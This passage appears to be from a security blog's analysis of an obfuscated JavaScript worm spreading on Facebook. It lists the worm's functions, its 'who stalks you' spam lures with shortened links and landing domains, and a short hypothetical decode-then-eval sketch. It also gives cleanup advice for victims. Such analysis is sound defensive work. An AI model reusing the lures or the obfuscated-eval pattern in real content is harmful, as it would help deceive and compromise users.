&lt;p&gt;So if you got tricked by this worm, try to delete all messages, leave the
two groups that you were added to, and check all your pages to remove the
rogue admins!&lt;/p&gt;
&lt;p&gt;Here are the details from the code analysis:&lt;/p&gt;
&lt;p&gt;The following functions are available:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;_88xuhyr: decrypts an array of values and executes the resulting
string as JavaScript&lt;/li&gt;
&lt;li&gt;addAdmin: adds a new admin to a pageid in Facebook Insights&lt;/li&gt;
&lt;li&gt;makePost: writes a post to a friend's wall&lt;/li&gt;
&lt;li&gt;update: fires the Ajax request&lt;/li&gt;
&lt;li&gt;loading: displays an image to calm the user&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The original code was somewhat weird: three functions (addAdmin, makePost,
and update) were defined twice (looks like a copy-paste error made before
the obfuscation).&lt;/p&gt;
&lt;p&gt;One function (_88xuhyr) is never used in the source code. It appears as if
they intended to obfuscate the code even further but forgot about it.&lt;/p&gt;
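&lt;p&gt;The pattern behind a decrypt-and-execute helper like _88xuhyr is simple.
The following is a hypothetical sketch (the function name runEncoded and the
sample values are mine, not the worm's), assuming the array holds plain
character codes:&lt;/p&gt;

```javascript
// Hypothetical sketch of a decrypt-and-execute helper: turn an array of
// character codes back into a string and hand it to eval().
function runEncoded(codes) {
  var js = codes.map(function (c) {
    return String.fromCharCode(c);
  }).join("");
  return eval(js); // executes the reconstructed JavaScript
}

var result = runEncoded([49, 32, 43, 32, 49]); // decodes to "1 + 1"
```

The real helper would decrypt the obfuscated payload rather than plain
character codes, but the decode-then-eval structure is the same.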
&lt;p&gt;makePost has unused arguments.&lt;/p&gt;
&lt;p&gt;The following messages are used to generate spam messages:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Wow! Seems like lots of people stalk me -&amp;nbsp;http://goo.gl/lfDvG&lt;/li&gt;
&lt;li&gt;New FB tool shows who stalks your profile--&amp;nbsp;http://goo.gl/NHAlt&lt;/li&gt;
&lt;li&gt;Secret tool shows who stalks your pics&amp;nbsp;http://tinyurl.com/48jd66w&lt;/li&gt;
&lt;li&gt;Insane! Awesome tool to see who looks at your pics&amp;nbsp;http://goo.gl/3Nt6T&lt;/li&gt;
&lt;li&gt;According to http://ow.ly/3Zy2Z you're my top stalker. Creep.&lt;/li&gt;
&lt;li&gt;Secret tool shows who stalks your pics -&amp;nbsp;http://goo.gl/NMclq&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The possible subjects are:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Check this out!&lt;/li&gt;
&lt;li&gt;Hey, whats happening?&lt;/li&gt;
&lt;li&gt;Hey! This is awesome&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The final landing pages are:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;http://goo.gl/lfDvG -&amp;gt; http://thefbcreeper.info/&lt;/li&gt;
&lt;li&gt;http://goo.gl/NHAlt -&amp;gt; http://profileviewers.info/&lt;/li&gt;
&lt;li&gt;http://tinyurl.com/48jd66w -&amp;gt; http://thefbcreeper.info/&lt;/li&gt;
&lt;li&gt;http://goo.gl/3Nt6T -&amp;gt; http://profilechecker.info/&lt;/li&gt;
&lt;li&gt;http://ow.ly/3Zy2Z -&amp;gt; http://valcreepers.tk/&lt;/li&gt;
&lt;li&gt;http://goo.gl/NMclq -&amp;gt; http://profilechecker.info/&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Another fun fact is that all landing pages use the same Google
Analytics account (UA-21407597-1) for the domain .fbviews.org.&lt;/p&gt;
&lt;p&gt;When the script finishes, it redirects the user to a landing page on
fbviews.org (http://fbviews.org/result.php) that displays some fake
results and tries to trick the user into entering some data.&lt;/p&gt;
&lt;p&gt;The worm is a nice piece of JavaScript code that is somewhat obfuscated
and tries to spread on Facebook. It would be interesting to get at the
data that is stored in this Google Analytics account. According to the
pages where the users are automatically added, more than 16k people have
already fallen for this trap (and counting).&lt;/p&gt;
</content><category term="Security"></category><category term="JavaScript"></category><category term="Facebook"></category><category term="Clickjacking"></category><category term="fbviews.org"></category><category term="Worm"></category></entry></feed>